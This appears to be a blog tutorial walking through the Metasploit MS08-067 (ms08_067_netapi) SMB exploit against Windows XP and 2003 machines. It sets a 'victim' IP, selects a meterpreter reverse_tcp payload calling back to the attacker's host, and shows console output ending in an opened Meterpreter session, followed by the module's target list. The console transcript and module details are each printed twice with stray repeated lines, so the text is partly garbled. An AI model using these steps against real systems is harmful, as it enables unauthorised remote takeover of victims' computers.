It exploits a parsing flaw in NetAPI32.dll through the
Server Service. This is an old, but still amazingly useful exploit. It can
target Windows XP SP2 and Windows XP SP3. It has auto detect target option, so
you don't have to worry about that.
Let's try and use it.
Type:
Let's try and use it.
Type:
PHP Code:
use windows/smb/ms08_067_netapi
Let's see what options we need to set by doing:
Code:
Show Options
We need to set RHost (Remote host). Port is by default
set to 445(RPort).
So let's input the IP of our victim:
So let's input the IP of our victim:
PHP Code:
set rhost 192.167.2.105
Now we need to choose payload. We will use meterpreter
payload because it's one of the best payloads out there.
PHP Code:
Set payload windows/meterpreter/reverse_tcp
Type show options again. Now it says we need to set lport
and lhost. Lhost is your IP address and Lport can be whatever port you want (It
mustn't be used already). I will use 4444.
PHP Code:
Set lhost 192.168.2.100
Set lport 4444
Set lport 4444
Now all we need to do is type exploit and new meterpreter session will open.
PHP Code:
exploit
Example:
Code:
II dTb.dTb _.---._
II 4' v 'B .'"".'/|`.""'.
II 6. .P : .' / | `. :
II 'T;. .;P' '.' / | `.'
II 'T; ;P' `. / | .'
II 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 796 exploits - 435 auxiliary - 131 post
+ -- --=[ 242 payloads - 27 encoders - 8 nops
=[ svn r14663 updated today (2012.01.31)
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
smsf exploit(ms08_067_netapi) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf exploit(ms08_067_netapi) > set lport 4444
lport => 4444
msf exploit(ms08_067_netapi) > set rhost 192.168.2.105
rhost => 192.168.2.105
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:Unknown
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:445)
II 4' v 'B .'"".'/|`.""'.
II 6. .P : .' / | `. :
II 'T;. .;P' '.' / | `.'
II 'T; ;P' `. / | .'
II 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 796 exploits - 435 auxiliary - 131 post
+ -- --=[ 242 payloads - 27 encoders - 8 nops
=[ svn r14663 updated today (2012.01.31)
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
smsf exploit(ms08_067_netapi) > set lhost 192.168.2.103
lhost => 192.168.2.103
msf exploit(ms08_067_netapi) > set lport 4444
lport => 4444
msf exploit(ms08_067_netapi) > set rhost 192.168.2.105
rhost => 192.168.2.105
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang:Unknown
[*] Selected Target: Windows XP SP0/SP1 Universal
[*] Triggering the vulnerability...
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.2.103:4444 -> 192.168.2.105:445)
More information:
Code:
Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.
Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Version: 14319
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Provided by:
hdm <hdm@metasploit.com>
Brett Moore <brett.moore@insomniasec.com>
staylor
jduck <jduck@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
10 Windows 2003 SP1 Japanese (NO NX)
11 Windows 2003 SP2 English (NO NX)
12 Windows 2003 SP2 English (NX)
13 Windows 2003 SP2 German (NO NX)
14 Windows 2003 SP2 German (NX)
15 Windows XP SP2 Arabic (NX)
16 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
17 Windows XP SP2 Chinese - Simplified (NX)
18 Windows XP SP2 Chinese - Traditional (NX)
19 Windows XP SP2 Czech (NX)
2 Windows XP SP0/SP1 Universal
20 Windows XP SP2 Danish (NX)
21 Windows XP SP2 German (NX)
22 Windows XP SP2 Greek (NX)
23 Windows XP SP2 Spanish (NX)
24 Windows XP SP2 Finnish (NX)
25 Windows XP SP2 French (NX)
26 Windows XP SP2 Hebrew (NX)
27 Windows XP SP2 Hungarian (NX)
28 Windows XP SP2 Italian (NX)
29 Windows XP SP2 Japanese (NX)
3 Windows XP SP2 English (AlwaysOn NX)
30 Windows XP SP2 Korean (NX)
31 Windows XP SP2 Dutch (NX)
32 Windows XP SP2 Norwegian (NX)
33 Windows XP SP2 Polish (NX)
34 Windows XP SP2 Portuguese - Brazilian (NX)
35 Windows XP SP2 Portuguese (NX)
36 Windows XP SP2 Russian (NX)
37 Windows XP SP2 Swedish (NX)
38 Windows XP SP2 Turkish (NX)
39 Windows XP SP3 Arabic (NX)
4 Windows XP SP2 English (NX)
40 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
41 Windows XP SP3 Chinese - Simplified (NX)
42 Windows XP SP3 Chinese - Traditional (NX)
43 Windows XP SP3 Czech (NX)
44 Windows XP SP3 Danish (NX)
45 Windows XP SP3 German (NX)
46 Windows XP SP3 Greek (NX)
47 Windows XP SP3 Spanish (NX)
48 Windows XP SP3 Finnish (NX)
49 Windows XP SP3 French (NX)
5 Windows XP SP3 English (AlwaysOn NX)
50 Windows XP SP3 Hebrew (NX)
51 Windows XP SP3 Hungarian (NX)
52 Windows XP SP3 Italian (NX)
53 Windows XP SP3 Japanese (NX)
54 Windows XP SP3 Korean (NX)
55 Windows XP SP3 Dutch (NX)
56 Windows XP SP3 Norwegian (NX)
57 Windows XP SP3 Polish (NX)
58 Windows XP SP3 Portuguese - Brazilian (NX)
59 Windows XP SP3 Portuguese (NX)
6 Windows XP SP3 English (NX)
60 Windows XP SP3 Russian (NX)
61 Windows XP SP3 Swedish (NX)
62 Windows XP SP3 Turkish (NX)
63 Windows 2003 SP2 Japanese (NO NX)
7 Windows 2003 SP0 Universal
8 Windows 2003 SP1 English (NO NX)
9 Windows 2003 SP1 English (NX)
Basic options:
Name Current Setting Required Description
---- -- -- --
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload information:
Space: 400
Avoid: 8 characters
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing NX on some operating systems and service packs.
The correct target must be used to prevent the Server Service (along
with a dozen others in the same process) from crashing. Windows XP
targets seem to handle multiple successful exploitation events, but
2003 targets will often crash or hang on subsequent attempts. This
is just the first version of this module, full support for NX bypass
on 2003, along with other platforms, is still in development.
Name: Microsoft Server Service Relative Path Stack Corruption
Module: exploit/windows/smb/ms08_067_netapi
Version: 14319
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Great
Provided by:
hdm <hdm@metasploit.com>
Brett Moore <brett.moore@insomniasec.com>
staylor
jduck <jduck@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
10 Windows 2003 SP1 Japanese (NO NX)
11 Windows 2003 SP2 English (NO NX)
12 Windows 2003 SP2 English (NX)
13 Windows 2003 SP2 German (NO NX)
14 Windows 2003 SP2 German (NX)
15 Windows XP SP2 Arabic (NX)
16 Windows XP SP2 Chinese - Traditional / Taiwan (NX)
17 Windows XP SP2 Chinese - Simplified (NX)
18 Windows XP SP2 Chinese - Traditional (NX)
19 Windows XP SP2 Czech (NX)
2 Windows XP SP0/SP1 Universal
20 Windows XP SP2 Danish (NX)
21 Windows XP SP2 German (NX)
22 Windows XP SP2 Greek (NX)
23 Windows XP SP2 Spanish (NX)
24 Windows XP SP2 Finnish (NX)
25 Windows XP SP2 French (NX)
26 Windows XP SP2 Hebrew (NX)
27 Windows XP SP2 Hungarian (NX)
28 Windows XP SP2 Italian (NX)
29 Windows XP SP2 Japanese (NX)
3 Windows XP SP2 English (AlwaysOn NX)
30 Windows XP SP2 Korean (NX)
31 Windows XP SP2 Dutch (NX)
32 Windows XP SP2 Norwegian (NX)
33 Windows XP SP2 Polish (NX)
34 Windows XP SP2 Portuguese - Brazilian (NX)
35 Windows XP SP2 Portuguese (NX)
36 Windows XP SP2 Russian (NX)
37 Windows XP SP2 Swedish (NX)
38 Windows XP SP2 Turkish (NX)
39 Windows XP SP3 Arabic (NX)
4 Windows XP SP2 English (NX)
40 Windows XP SP3 Chinese - Traditional / Taiwan (NX)
41 Windows XP SP3 Chinese - Simplified (NX)
42 Windows XP SP3 Chinese - Traditional (NX)
43 Windows XP SP3 Czech (NX)
44 Windows XP SP3 Danish (NX)
45 Windows XP SP3 German (NX)
46 Windows XP SP3 Greek (NX)
47 Windows XP SP3 Spanish (NX)
48 Windows XP SP3 Finnish (NX)
49 Windows XP SP3 French (NX)
5 Windows XP SP3 English (AlwaysOn NX)
50 Windows XP SP3 Hebrew (NX)
51 Windows XP SP3 Hungarian (NX)
52 Windows XP SP3 Italian (NX)
53 Windows XP SP3 Japanese (NX)
54 Windows XP SP3 Korean (NX)
55 Windows XP SP3 Dutch (NX)
56 Windows XP SP3 Norwegian (NX)
57 Windows XP SP3 Polish (NX)
58 Windows XP SP3 Portuguese - Brazilian (NX)
59 Windows XP SP3 Portuguese (NX)
6 Windows XP SP3 English (NX)
60 Windows XP SP3 Russian (NX)
61 Windows XP SP3 Swedish (NX)
62 Windows XP SP3 Turkish (NX)
63 Windows 2003 SP2 Japanese (NO NX)
7 Windows 2003 SP0 Universal
8 Windows 2003 SP1 English (NO NX)
9 Windows 2003 SP1 English (NX)
Basic options:
Name Current Setting Required Description
---- -- -- --
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload information:
Space: 400
Avoid: 8 characters
No comments:
Post a Comment